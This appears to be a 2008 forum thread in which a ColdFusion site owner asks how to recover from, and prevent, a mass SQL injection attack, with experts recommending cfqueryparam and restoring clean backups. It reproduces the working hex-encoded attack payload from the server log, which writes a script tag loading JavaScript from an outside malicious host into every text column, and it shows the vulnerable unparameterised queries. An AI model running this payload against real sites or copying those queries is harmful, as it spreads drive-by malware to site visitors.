Link to home
Start Free TrialLog in
Avatar of cadkins
cadkins

asked on

SQL Injection Attack - Need help please!

Hi,

We are experiencing a really bad SQL Injection attack on our webserver (we are using coldfusion). It has added the following code to many of our fields:
<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>
Can someone guide me step to step on how to get rid of this code and also make sure it doesn't happen again in the future?
This is really urgent!

Thanks :)
Avatar of cadkins
cadkins

ASKER

Oh and this is from the IIS logs:

2008-08-08 00:13:06 192.168.80.10 GET /ah/ah_locations.cfm locationID=6';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 24.86.13.131

I deleted the ah_locations.cfm page yesterday just to see if that will help but it still finds it somehow...
HELP!
Avatar of Aneesh
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS varchar(4000) )
select @s  
Avatar of cadkins

ASKER

Can you be little bit more specific please? :)
ASKER CERTIFIED SOLUTION
Avatar of Aneesh
Aneesh
Flag of Canada image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
xtype
99 - ntext
35   - text
231 - nvarchar
167 - varchar
Avatar of cadkins

ASKER

Well I understand that its selecting the table names and the column names from my database but how can i make this stop?

Thanks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of cadkins

ASKER

No I'm not using cfqueryparams...
Here are some examples of queries we are using
		<cfquery name="getEmpAppl" datasource="#Request.DataSource#">
			select * from employmentApplication
			where 	employmentApplicationID = #url.employmentApplicationID#
		</cfquery>
 
		<cfquery name="updateStatus" datasource= "#Request.DataSource#">
			UPDATE employmentApplication SET
				status = 'Viewed'
			WHERE employmentApplicationID = #url.employmentApplicationID#	
		</cfquery>
		
		<!---get the --->
		<cfquery name="getQuestions" datasource="#Request.DataSource#">
			select a.employmentApplicationID, a.empApplQuestionID, a.Answer, b.questionText
			from empApplQuestion a, empApplicationQuestions b
			where 	employmentApplicationID = #url.employmentApplicationID#
			and a.empApplQuestionID = b.empApplQuestionID
		</cfquery>

Open in new window

in every one of your queries add cfqueryparam


ie:
<cfqueryparam cfsqltype="cf_sql_varchar" value="#form.stringvalue#">

you can add htmleditformat for added protection

<cfqueryparam cfsqltype="cf_sql_varchar" value="#htmleditformat(form.stringvalue)#">

Avatar of cadkins

ASKER

So how would I re-write the 3 queries that I showed you on the example above to include cfqueryparam?
I'm confused on what exactly should I replace with what...

Thanks
**CFQUERYPARAM is your best weapon against sql injections. **
You absolutely without any doubt add it to ALL your queries as soon as possible.
You will also gain a performance boost (slight one but over many requests it does make a difference).
instead of using dynamic sql . use sps, thats the best approach
Avatar of cadkins

ASKER

I think I wanna stick with sql but I'm still not sure how to use cfqueryparam...
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
"Is it me or are  there many such reports today???"

last 2 days actually... there's lots of reports of this...and not just cfm sites

http://isc.sans.org/diary.html
Avatar of cadkins

ASKER

Cool that helps :)
So once I add cfqueryparam to all the queries, will that get rid of all the scripts that have been added to many of the fields of my database? (I'm talking about <script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>)

Thanks
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of cadkins

ASKER

I'm assuming that if I have clean backup of the database (before the attack) and I restore it that could work too right?
that would be the easiest for sure

i'd do a backup of the compormised db for forensics before you restore from the old
Avatar of cadkins

ASKER

Ok I will try that and I will let you know sometime probably Monday if it worked
Thanks!
Avatar of cadkins

ASKER

I'm working on changing all the queries (there are 100s of them).
If I leave the old queries in my code as a comment (using <!--- and --->) would that be a problem? I just want to make sure that if I do something wrong I can always refer back to the old queries.
So basically I'm just wondering if code in a comment can be vulnerable to a SQL injection attack.
Thanks
"if code in a comment can be vulnerable to a SQL injection attack."

no...it's a good idea actually... altho i'd go back once you've verified all is working as expected and remove them at some later date... makes the code easier to read later on

cf code comments are simply removed by the parser before any processing is done.

Avatar of cadkins

ASKER

Thanks!
One more question. If a query has no "where" clause do I need to change anything?
For example:

            <cfquery name="qryGetDataNew" datasource="#Request.DataSource#">
                        select * from Incidents
                        order by recordNo
            </cfquery>
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
("where 1 = <cfqueryparam cfsqltype="cf_sql_integer" value="1"/>."

didn't know that yama .. thx for the link)
SidFishes, Check out all the other performance articles on that site. There's a good deal of stuff there.
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
for everyone's information

there's an additional vuln possible if you are using Order by

http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by#more
Avatar of cadkins

ASKER

I finally modified all of the queries and now I'm testing to see if everything went well.
Most of them so far are OK but in addition to our SQL database we are also using an Access database for a small part of our website. I get an error on the page that we use the Access database.
Does cfqueryparam work for Access?
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial